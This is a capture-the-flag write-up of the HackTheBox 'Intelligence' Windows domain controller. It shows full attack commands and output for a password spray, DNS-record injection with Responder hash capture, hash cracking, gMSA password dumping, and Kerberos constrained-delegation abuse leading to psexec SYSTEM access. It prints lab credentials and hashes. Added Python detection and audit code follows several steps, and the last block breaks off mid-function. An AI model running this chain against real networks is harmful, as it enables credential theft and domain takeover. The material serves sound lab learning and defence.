Nmap scan
kali@kali ~/HTB/intelligence/intelligence2
▶ nmap -sV -sC -oA intelligence $IP -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-02 06:43 EDT
Nmap scan report for intelligence.htb (10.10.10.248)
Host is up (0.28s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Intelligence
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-02 17:44:11Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2023-10-02T17:45:36+00:00; +7h00m06s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2023-10-02T17:45:35+00:00; +7h00m06s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2023-10-02T17:45:36+00:00; +7h00m06s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-02T17:45:35+00:00; +7h00m06s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-10-02T17:44:55
|_ start_date: N/A
|_clock-skew: mean: 7h00m05s, deviation: 0s, median: 7h00m05s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.66 seconds
kali@kali ~/HTB/intelligence/intelligence2
Check port 80 first as low-hanging fruit; it is a potential foothold.
Looking around the site, there is a link to download a document: http://10.10.10.248/documents/2020-01-01-upload.pdf
Download the document and check its EXIF metadata.
kali@kali ~/HTB/intelligence/intelligence2
▶ ls
2020-01-01-upload.pdf intelligence.gnmap intelligence.nmap intelligence.xml
kali@kali ~/HTB/intelligence/intelligence2
▶ exiftool 2020-01-01-upload.pdf
ExifTool Version Number : 12.65
File Name : 2020-01-01-upload.pdf
Directory : .
File Size : 27 kB
File Modification Date/Time : 2021:04:01 13:00:00-04:00
File Access Date/Time : 2023:10:02 06:52:39-04:00
File Inode Change Date/Time : 2023:10:02 06:52:39-04:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 1
Creator : William.Lee
kali@kali ~/HTB/intelligence/intelligence2
We see there is a user called William.Lee.
We enumerate the link by changing the date and find that other documents exist, such as http://10.10.10.248/documents/2020-01-02-upload.pdf
We used the following script to download every file for the year (it probes each date-named URL with wget --spider and downloads only those that exist):
#!/bin/bash
base_url="http://10.10.10.248/documents"
year=2020
for month in $(seq -w 1 12); do
    case $month in
        01|03|05|07|08|10|12) days=31;;
        04|06|09|11) days=30;;
        02)
            # For 2020, which is a leap year
            days=29
            ;;
    esac
    for day in $(seq -w 1 $days); do
        url="${base_url}/${year}-${month}-${day}-upload.pdf"
        # Check if file exists without downloading it
        if wget --spider -q "$url" 2>/dev/null; then
            wget "$url" # Only download if the file exists
        fi
    done
done
kali@kali ~/HTB/intelligence
Running the script from a new pdf folder downloads all the files:
kali@kali ~/HTB/intelligence
▶ cd intelligence2/pdf
kali@kali ~/HTB/intelligence/intelligence2/pdf
▶ ls
download_pdfs.sh
kali@kali ~/HTB/intelligence/intelligence2/pdf
▶ ./download_pdfs.sh
pdf folder
▶ ls
2020-01-01-upload.pdf 2020-05-20-upload.pdf 2020-09-04-upload.pdf
2020-01-02-upload.pdf 2020-05-21-upload.pdf 2020-09-05-upload.pdf
2020-01-04-upload.pdf 2020-05-24-upload.pdf 2020-09-06-upload.pdf
2020-01-10-upload.pdf 2020-05-29-upload.pdf 2020-09-11-upload.pdf
2020-01-20-upload.pdf 2020-06-02-upload.pdf 2020-09-13-upload.pdf
2020-01-22-upload.pdf 2020-06-03-upload.pdf 2020-09-16-upload.pdf
2020-01-23-upload.pdf 2020-06-04-upload.pdf 2020-09-22-upload.pdf
2020-01-25-upload.pdf 2020-06-07-upload.pdf 2020-09-27-upload.pdf
2020-01-30-upload.pdf 2020-06-08-upload.pdf 2020-09-29-upload.pdf
Script to extract the Creator field from every PDF and append the values to users.txt:
▶ cat exif.sh
#!/bin/bash
# Directory containing the PDF files
dir="."
# Iterate over all PDF files in the directory
for pdf in "$dir"/*.pdf; do
    # Extract the 'Creator' field using exiftool
    creator=$(exiftool -Creator "$pdf" | awk -F': ' '{print $2}')
    if [ -n "$creator" ]; then # Check if the 'Creator' field is not empty
        echo "$creator" >> users.txt
    fi
done
▶ ./exif.sh
kali@kali ~/HTB/intelligence/intelligence2/pdf
▶ less users.txt
kali@kali ~/HTB/intelligence/intelligence2/pdf
▶ more users.txt
William.Lee
Scott.Scott
Jason.Wright
Veronica.Patel
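The same Creator-field check as a pre-publication audit, written here as an added example (it is not the write-up's exif.sh and not code from any tool used above). It is pure Python, needs no exiftool, and parses the PDF Info dictionary directly, handling literal strings with backslash escapes as well as hex-encoded UTF-16 strings. The PDFs it scans are constructed in-line with names mirroring the write-up's users.txt; scan_directory() runs the same check over a real folder, for example a web root before documents are published.

```python
import re
from pathlib import Path

# Creator/Author/Producer entries in a PDF Info dictionary, as either a
# literal string  /Creator (William.Lee)  or a hex string  /Creator <FEFF0057...>.
# A literal may contain \-escapes and one level of balanced parentheses.
_LITERAL = re.compile(rb"/(Creator|Author|Producer)\s*\(((?:\\.|[^()\\]|\([^()\\]*\))*)\)")
_HEXSTR = re.compile(rb"/(Creator|Author|Producer)\s*<([0-9A-Fa-f\s]*)>")
_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f",
            b"(": b"(", b")": b")", b"\\": b"\\"}


def to_text(raw: bytes) -> str:
    """PDF text strings are UTF-16BE when they start with a BOM, otherwise
    PDFDocEncoding (Latin-1 is close enough for names)."""
    if raw[:2] == b"\xfe\xff":
        return raw[2:].decode("utf-16-be", errors="replace")
    return raw.decode("latin-1")


def unescape_literal(raw: bytes) -> bytes:
    """Resolve backslash escapes (\\n, \\(, \\), \\ddd octal) inside a literal string."""
    out = bytearray()
    i = 0
    while i < len(raw):
        if raw[i:i + 1] == b"\\" and i + 1 < len(raw):
            nxt = raw[i + 1:i + 2]
            if nxt in _ESCAPES:
                out += _ESCAPES[nxt]
                i += 2
                continue
            if raw[i + 1] in b"01234567":        # up to three octal digits
                j = i + 1
                while j < len(raw) and j < i + 4 and raw[j] in b"01234567":
                    j += 1
                out.append(int(raw[i + 1:j], 8) & 0xFF)
                i = j
                continue
        out += raw[i:i + 1]
        i += 1
    return bytes(out)


def pdf_metadata(data: bytes) -> dict:
    """Return {field: value} for the Info-dictionary fields found in raw PDF bytes."""
    found = {}
    for m in _LITERAL.finditer(data):
        found.setdefault(m.group(1).decode(), to_text(unescape_literal(m.group(2))))
    for m in _HEXSTR.finditer(data):
        digits = re.sub(rb"\s", b"", m.group(2))
        if len(digits) % 2:                      # the spec pads an odd trailing digit with 0
            digits += b"0"
        found.setdefault(m.group(1).decode(), to_text(bytes.fromhex(digits.decode())))
    return found


def leaked_identities(pdfs: dict) -> dict:
    """Map each distinct Creator/Author value to the set of files carrying it."""
    by_name = {}
    for filename, data in pdfs.items():
        meta = pdf_metadata(data)
        for field in ("Creator", "Author"):
            value = meta.get(field, "").strip()
            if value:
                by_name.setdefault(value, set()).add(filename)
    return by_name


def scan_directory(path: str) -> dict:
    """Same check over real files on disk."""
    return leaked_identities({p.name: p.read_bytes() for p in Path(path).glob("*.pdf")})


def _mini_pdf(info_entries: bytes) -> bytes:
    # Constructed: the smallest layout that still carries an Info dictionary.
    return (b"%PDF-1.5\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
            b"2 0 obj\n<< " + info_entries + b" /Producer (LibreOffice 7.0) >>\nendobj\n"
            b"trailer\n<< /Root 1 0 R /Info 2 0 R >>\n%%EOF\n")


# Constructed sample set (not the documents from the target).
SAMPLE_PDFS = {
    "2020-01-01-upload.pdf": _mini_pdf(b"/Creator (William.Lee)"),
    "2020-01-02-upload.pdf": _mini_pdf(b"/Creator (Scott.Scott)"),
    "2020-01-04-upload.pdf": _mini_pdf(b"/Author (William.Lee) /Creator (William.Lee)"),
    # UTF-16BE hex string spelling "Veronica.Patel"
    "2020-01-10-upload.pdf": _mini_pdf(b"/Creator <FEFF 0056 0065 0072 006F 006E 0069 0063 0061 002E 0050 0061 0074 0065 006C>"),
    # escaped parentheses inside a literal string
    "2020-01-20-upload.pdf": _mini_pdf(b"/Creator (Jason.Wright \\(IT\\))"),
    "report.pdf": _mini_pdf(b"/Creator ()"),   # empty field: nothing to report
}

if __name__ == "__main__":
    for name, files in sorted(leaked_identities(SAMPLE_PDFS).items()):
        print(f"{name:<20} {', '.join(sorted(files))}")
```

Any non-empty name the scan reports is a username leak waiting to happen; stripping the Info dictionary (or setting Creator/Author to a generic value) before upload removes exactly what the write-up harvested.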
We convert all the PDFs into a single text file with pdftotext so we can search it for words like password:
kali@kali ~/HTB/intelligence/intelligence2/pdf
▶ for pdf in *.pdf; do
    pdftotext "$pdf" - >> combined.txt
done
kali@kali ~/HTB/intelligence/intelligence2/pdf
▶
Searching for the word password in this file, showing one line of context before and after:
▶ grep -B 1 -A 1 "password" combined.txt
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
kali@kali ~/HTB/intelligence/intelligence2/pdf
We get the password: NewIntelligenceCorpUser9876
We check this password against all the users with crackmapexec:
kali@kali ~/HTB/intelligence/intelligence2/pdf
▶ crackmapexec smb 10.10.10.248 -u users.txt -p NewIntelligenceCorpUser9876
SMB 10.10.10.248 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.248 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
The only valid login is the last one, Tiffany.Molina.
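What the spray above looks like from the domain controller's side, as an added example that is not part of the write-up: one source address producing failed logons (event 4625) against many distinct accounts within seconds, followed by a single success (4624). The event lines are constructed to mirror the crackmapexec run; the flat field layout is an assumed SIEM-style export, not Windows' own XML.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: Security-log logon events flattened to
# "<time> <event id> <target account> <source ip> <logon type>".
# 4625 = logon failed, 4624 = logon succeeded; logon type 3 = network (SMB), 2 = interactive.
SAMPLE_EVENTS = """\
2023-10-02T17:50:01 4625 William.Lee 10.10.14.21 3
2023-10-02T17:50:01 4625 Scott.Scott 10.10.14.21 3
2023-10-02T17:50:02 4625 Jason.Wright 10.10.14.21 3
2023-10-02T17:50:02 4625 Veronica.Patel 10.10.14.21 3
2023-10-02T17:50:03 4625 Richard.Williams 10.10.14.21 3
2023-10-02T17:50:03 4624 Tiffany.Molina 10.10.14.21 3
2023-10-02T17:55:10 4625 Ted.Graves 10.10.14.5 2
2023-10-02T17:55:40 4625 Ted.Graves 10.10.14.5 2
2023-10-02T17:56:05 4624 Ted.Graves 10.10.14.5 2
"""


def parse_events(text: str) -> list:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, user, src, logon_type = line.split()
        events.append({"time": datetime.fromisoformat(ts), "id": int(event_id),
                       "user": user.lower(), "src": src, "logon_type": int(logon_type)})
    return sorted(events, key=lambda e: e["time"])


def detect_password_spray(events: list, window=timedelta(minutes=10), min_accounts=5) -> list:
    """One alert per source whose failed logons inside any `window` touch at least
    `min_accounts` distinct accounts. A single user mistyping their own password
    repeatedly hits one account and is not reported."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    alerts = []
    for src, evs in by_src.items():
        failures = [e for e in evs if e["id"] == 4625]
        for i, first in enumerate(failures):
            in_window = [e for e in failures[i:] if e["time"] - first["time"] <= window]
            accounts = {e["user"] for e in in_window}
            if len(accounts) < min_accounts:
                continue
            end = in_window[-1]["time"] + window
            # A success from the same source right after the burst means the spray found a password.
            compromised = sorted({e["user"] for e in evs
                                  if e["id"] == 4624 and first["time"] <= e["time"] <= end})
            alerts.append({"src": src, "start": first["time"],
                           "distinct_accounts": len(accounts), "compromised": compromised})
            break
    return alerts


if __name__ == "__main__":
    for a in detect_password_spray(parse_events(SAMPLE_EVENTS)):
        print(f"{a['start']:%H:%M:%S} spray from {a['src']}: {a['distinct_accounts']} accounts, "
              f"successful logon for {a['compromised'] or 'none'}")
```

Keying on distinct target accounts per source, rather than on failure count per account, is what separates a spray from ordinary lockout noise: the spray never trips per-account lockout thresholds because each account sees only one attempt.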
We check with crackmapexec whether Tiffany.Molina can log in over WinRM, but no luck:
▶ crackmapexec winrm 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876
SMB 10.10.10.248 5985 DC [*] Windows 10.0 Build 17763 (name:DC) (domain:intelligence.htb)
HTTP 10.10.10.248 5985 DC [*] http://10.10.10.248:5985/wsman
WINRM 10.10.10.248 5985 DC [-] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
We list the shares accessible to Tiffany.Molina:
SMB 10.10.10.248 445 DC ADMIN$ Remote Admin
SMB 10.10.10.248 445 DC C$ Default share
SMB 10.10.10.248 445 DC IPC$ READ Remote IPC
SMB 10.10.10.248 445 DC IT READ
SMB 10.10.10.248 445 DC NETLOGON READ Logon server share
SMB 10.10.10.248 445 DC SYSVOL READ Logon server share
SMB 10.10.10.248 445 DC Users READ
We have read access to the Users share.
Connecting to the Users share:
▶ smbclient \\\\10.10.10.248\\users -U tiffany.molina%NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun Apr 18 21:20:26 2021
.. DR 0 Sun Apr 18 21:20:26 2021
Administrator D 0 Sun Apr 18 20:18:39 2021
All Users DHSrn 0 Sat Sep 15 03:21:46 2018
Default DHR 0 Sun Apr 18 22:17:40 2021
Default User DHSrn 0 Sat Sep 15 03:21:46 2018
desktop.ini AHS 174 Sat Sep 15 03:11:27 2018
Public DR 0 Sun Apr 18 20:18:39 2021
Ted.Graves D 0 Sun Apr 18 21:20:26 2021
Tiffany.Molina D 0 Sun Apr 18 20:51:46 2021
3770367 blocks of size 4096. 1463758 blocks available
smb: \>
We are able to get the user flag:
smb: \> cd Tiffany.Mplina
cd \Tiffany.Mplina\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> cd Tiffany.Molina
smb: \Tiffany.Molina\> ls
smb: \Tiffany.Molina\> cd Desktop
smb: \Tiffany.Molina\Desktop\> ls
. DR 0 Sun Apr 18 20:51:46 2021
.. DR 0 Sun Apr 18 20:51:46 2021
user.txt AR 34 Mon Oct 2 13:42:29 2023
3770367 blocks of size 4096. 1463758 blocks available
smb: \Tiffany.Molina\Desktop\> type user.txt
type: command not found
smb: \Tiffany.Molina\Desktop\> cat user.txt
cat: command not found
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Tiffany.Molina\Desktop\>
▶ cat user.txt
9e0e4c1cdafbb30517b2ed66346a81cd
kali@kali ~/HTB/intelligence/intelligence2/pdf
▶
Tiffany.Molina also has read access to the IT share; we connect to it and retrieve the .ps1 file found there.
D 0 Sun Apr 18 20:50:55 2021
downdetector.ps1 A 1046 Sun Apr 18 20:50:55 2021
3770367 blocks of size 4096. 1463758 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \>
The contents of downdetector.ps1:
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if(.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <[email protected]>' -To 'Ted Graves <[email protected]>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}
After some research we find that we can use dnstool.py (from krbrelayx) together with Responder to capture what this script sends: it fetches every DNS record named web* and requests http://<name> with -UseDefaultCredentials, so a web* record pointing at our host receives the authentication of the account running the script.
We run responder
▶ sudo python Responder.py -I tun0 -i 10.10.14.21 -A
and run dnstool
▶ python dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a add -r webfakedomain.intelligence.htb --data 10.10.14.21 10.10.10.248
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
kali@kali ~/HTB/intelligence/krbrelayx master
▶
Responder captures a NetNTLMv2 hash for Ted.Graves:
Ted.Graves::intelligence:2291e74033392ca3:FF33E10D045B6E1A7C7C4B67B58C1384:010100000000000007043557BBF0D90172F47A5018A5B99D00000000020008005900500032004E0001001E00570049004E002D004D003500540036003600410031005000550059004700040014005900500032004E002E004C004F00430041004C0003003400570049004E002D004D0035005400360036004100310050005500590047002E005900500032004E002E004C004F00430041004C00050014005900500032004E002E004C004F00430041004C0008003000300000000000000000000000002000005C6E85BD47BB8677D646712E35A83DCDBAC1972A80DCFFA047D66D08463DAE000A001000000000000000000000000000000000000900460048005400540050002F00770065006200660061006B00650064006F006D00610069006E002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
We save this to a file called ted.
It is a NetNTLMv2 hash (hashcat mode 5600).
We run it against rockyou with hashcat:
▶ cd /usr/bin
kali@kali /usr/bin
▶ sudo ./hashcat -m 5600 /home/kali/HTB/intelligence/ted /usr/share/wordlists/rockyou.txt
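To see what the captured line actually contains before it goes to hashcat, here is an added parser for the mode-5600 layout (not part of the write-up, nor code from Responder or hashcat). It splits user::domain:server-challenge:NTProofStr:blob and walks the blob's AV_PAIR list as defined in MS-NLMP: the NetBIOS and DNS names identify the authenticating client, and MsvAvTargetName records the SPN the client believed it was talking to, which is what an incident responder wants from such a capture. The blob is the line from above; MsvAvSingleHost and MsvAvChannelBindings are shown raw in hex.

```python
import struct
from datetime import datetime, timedelta, timezone

# Capture line as printed by Responder above; hashcat mode 5600 expects exactly this layout:
# user::domain:server_challenge:NTProofStr:blob
CAPTURED = (
    "Ted.Graves::intelligence:2291e74033392ca3:FF33E10D045B6E1A7C7C4B67B58C1384:"
    "010100000000000007043557BBF0D90172F47A5018A5B99D00000000020008005900500032004E0001001E00570049004E002D004D003500540036003600410031005000550059004700040014005900500032004E002E004C004F00430041004C0003003400570049004E002D004D0035005400360036004100310050005500590047002E005900500032004E002E004C004F00430041004C00050014005900500032004E002E004C004F00430041004C0008003000300000000000000000000000002000005C6E85BD47BB8677D646712E35A83DCDBAC1972A80DCFFA047D66D08463DAE000A001000000000000000000000000000000000000900460048005400540050002F00770065006200660061006B00650064006F006D00610069006E002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000"
)

# AvId values from MS-NLMP section 2.2.2.1
AV_IDS = {0: "MsvAvEOL", 1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
          3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName",
          6: "MsvAvFlags", 7: "MsvAvTimestamp", 8: "MsvAvSingleHost",
          9: "MsvAvTargetName", 10: "MsvAvChannelBindings"}
_UTF16_IDS = {1, 2, 3, 4, 5, 9}


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME: 100-ns ticks since 1601-01-01 UTC."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_netntlmv2(line: str) -> dict:
    user, _, domain, server_chal, ntproof, blob_hex = line.strip().split(":", 5)
    # Tolerate a line that was cut off mid-byte when copied; the prefix still parses.
    blob = bytes.fromhex(blob_hex[: len(blob_hex) // 2 * 2])
    # NTLMv2_CLIENT_CHALLENGE: RespType(1) HiRespType(1) Reserved(6) TimeStamp(8)
    # ClientChallenge(8) Reserved(4) AvPairs(...). NTProofStr is HMAC-MD5 over
    # server_challenge || blob keyed with the NTLMv2 hash; that is what hashcat brute-forces.
    resp_type, hi_resp_type = blob[0], blob[1]
    (filetime,) = struct.unpack_from("<Q", blob, 8)
    client_chal = blob[16:24]
    av_pairs = []
    off = 28
    while off + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == 0 or off + av_len > len(blob):   # end of list, or truncated capture
            break
        value = blob[off:off + av_len]
        off += av_len
        if av_id in _UTF16_IDS:
            value = value.decode("utf-16-le", errors="replace")
        elif av_id == 7 and av_len == 8:
            value = filetime_to_datetime(struct.unpack("<Q", value)[0]).isoformat()
        else:
            value = value.hex()
        av_pairs.append((AV_IDS.get(av_id, f"unknown({av_id})"), value))
    return {"user": user, "domain": domain, "server_challenge": server_chal.lower(),
            "ntproofstr": ntproof.lower(), "resp_type": (resp_type, hi_resp_type),
            "timestamp": filetime_to_datetime(filetime), "client_challenge": client_chal.hex(),
            "av_pairs": av_pairs}


if __name__ == "__main__":
    r = parse_netntlmv2(CAPTURED)
    print(f"{r['user']}@{r['domain']} at {r['timestamp']:%Y-%m-%d %H:%M:%S}Z, "
          f"server challenge {r['server_challenge']}")
    for name, value in r["av_pairs"]:
        print(f"  {name:<22} {value}")
```

The timestamp inside the blob is the client's clock, not the capturing host's, so it is the value to line up against the DC's event log when reconstructing which scheduled run of the script produced the authentication.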
With Ted's cracked password we run bloodhound-python to collect the JSON files that we can load into BloodHound:
▶ bloodhound-python -u TED.GRAVES -p 'Mr.Teddy' -ns 10.10.10.248 -d intelligence.htb -c all
INFO: Found AD domain: intelligence.htb
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 42 users
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: svc_int.intelligence.htb
INFO: Querying computer: dc.intelligence.htb
WARNING: Could not resolve: svc_int.intelligence.htb: The resolution lifetime expired after 3.202 seconds: Server Do53:10.10.10.248@53 answered The DNS operation timed out.; Server Do53:10.10.10.248@53 answered The DNS operation timed out.
We start neo4j and load the JSON files into BloodHound.
From the graph: Ted.Graves is in the ITSupport group, which has ReadGMSAPassword on SVC_INT. Even more interestingly, using the pre-built query "Shortest Path from Owned Principals", the svc_int account has AllowedToDelegate on the DC.
There is a tool for reading gMSA passwords at https://github.com/micahvandeusen/gMSADumper
▶ wget https://raw.githubusercontent.com/micahvandeusen/gMSADumper/main/gMSADumper.py
--2023-10-02 08:36:04-- https://raw.githubusercontent.com/micahvandeusen/gMSADumper/main/gMSADumper.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6287 (6.1K) [text/plain]
Saving to: ‘gMSADumper.py’
gMSADumper.py 100%[===============================>] 6.14K --.-KB/s in 0.001s
2023-10-02 08:36:05 (6.33 MB/s) - ‘gMSADumper.py’ saved [6287/6287]
kali@kali ~/HTB/intelligence/intelligence2
▶
We run it with Ted's credentials and get the NT hash (and AES keys) for the svc_int$ account:
▶ python gMSADumper.py -u Ted.Graves -p Mr.Teddy -l intelligence.htb -d intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::ff3418066942aa8bd228ea17dc71999a
svc_int$:aes256-cts-hmac-sha1-96:30844881b57965c3a115cafa00eb0935928ff0af889f3818e0bc1ccf50c0cbfb
svc_int$:aes128-cts-hmac-sha1-96:327f8f8594183dfe4f430986556147b2
kali@kali ~/HTB/intelligence/intelligence2
We use Impacket's getST.py. Because svc_int has AllowedToDelegate on the DC (constrained delegation), getST.py can request a service ticket for www/dc.intelligence.htb while impersonating administrator, via S4U2self followed by S4U2proxy.
kali@kali ~/HTB/intelligence/intelligence2
▶ locate getST.py
/usr/share/doc/python3-impacket/examples/getST.py
kali@kali ~/HTB/intelligence/intelligence2
▶ cd /usr/share/doc/python3-impacket/examples/
kali@kali /usr/share/doc/python3-impacket/examples
▶ getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :ff3418066942aa8bd228ea17dc71999a -impersonate administrator intelligence.htb/svc_int
zsh: command not found: getST.py
✘ kali@kali /usr/share/doc/python3-impacket/examples
▶ ./getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :ff3418066942aa8bd228ea17dc71999a -impersonate administrator intelligence.htb/svc_int
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
kali@kali /usr/share/doc/python3-impacket/examples
The KRB_AP_ERR_SKEW error is the 7-hour clock skew the nmap output showed; we sync our clock with the DC via NTP and retry:
▶ /usr/share/doc/python3-impacket/examples/getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :ff3418066942aa8bd228ea17dc71999a -impersonate administrator intelligence.htb/svc_int
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
kali@kali ~/HTB/intelligence/intelligence2
▶ ls
2020-01-01-upload.pdf gMSADumper.py intelligence.gnmap intelligence.xml
administrator.ccache gMSADumper.py.1 intelligence.nmap pdf
kali@kali ~/HTB/intelligence/intelligence2
We export the ticket so Impacket's tools pick it up:
kali@kali ~/HTB/intelligence/intelligence2
▶ export KRB5CCNAME=administrator.ccache
Using psexec.py with the Kerberos ticket (-k -no-pass):
▶ /usr/share/doc/python3-impacket/examples/psexec.py -k -no-pass [email protected]@dc.intelligence.htb
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file fJuQdKmn.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service pONO on dc.intelligence.htb.....
[*] Starting service pONO.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
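The psexec.py session above leaves a distinctive trace on the DC: a binary with a random 8-letter name written to ADMIN$ (C:\Windows) and a service with a random 4-letter name created and started, which Windows records as System-log event 7045. The following added detection (not part of the write-up or of Impacket) scores constructed 7045 events on those traits; the flat field layout is assumed, as a SIEM export would have it.

```python
import ntpath
import re

# Constructed sample of System-log event 7045 ("A service was installed in the system"),
# flattened to: time|ServiceName|ImagePath|ServiceType|StartType|AccountName
SAMPLE_7045 = r"""
2023-10-02T10:00:00|Spooler|C:\Windows\System32\spoolsv.exe|user mode service|auto start|LocalSystem
2023-10-02T10:05:00|Sense|"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"|user mode service|demand start|LocalSystem
2023-10-02T17:58:12|pONO|%SystemRoot%\fJuQdKmn.exe|user mode service|demand start|LocalSystem
2023-10-02T18:20:44|BTAGService|C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p|user mode service|demand start|NT AUTHORITY\LocalService
"""

RANDOM_EXE = re.compile(r"^[A-Za-z]{8}\.exe$")   # e.g. fJuQdKmn.exe
RANDOM_SVC = re.compile(r"^[A-Za-z]{4}$")        # e.g. pONO


def binary_path(image_path: str) -> str:
    """Executable part of an ImagePath, without arguments or the \\?\ prefix."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        path = image_path[1:].split('"', 1)[0]
    else:
        path = image_path.split(" ", 1)[0]
    if path.startswith("\\\\?\\"):
        path = path[4:]
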